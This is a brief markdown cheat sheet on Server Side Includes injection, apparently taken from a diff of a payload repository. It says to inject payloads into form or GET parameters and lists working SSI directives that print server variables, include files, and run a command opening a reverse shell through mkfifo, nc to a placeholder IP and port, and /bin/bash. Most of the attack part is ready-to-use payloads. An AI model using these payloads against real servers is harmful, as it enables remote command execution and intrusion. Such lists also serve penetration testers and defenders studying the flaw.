SSI (Server Side Includes) Injection is a type of web security vulnerability that occurs when a web application allows untrusted user-supplied data to be used as part of a Server Side Include (SSI) directive
5
+
6
+
## Where to find
7
+
Usually it can be found anywhere. Just try to input the payload in the form or GET parameter
8
+
9
+
## How to exploit
10
+
1. Print a date
11
+
```
12
+
<!--#echo var="DATE_LOCAL" -->
13
+
```
14
+
15
+
2. Print all the variabels
16
+
```
17
+
<!--#printenv -->
18
+
```
19
+
20
+
3. Include a file
21
+
```
22
+
<!--#include file="includefile.html" -->
23
+
```
24
+
25
+
4. Doing a reverse shell
26
+
```
27
+
<!--#exec cmd="mkfifo /tmp/foo;nc IP PORT 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->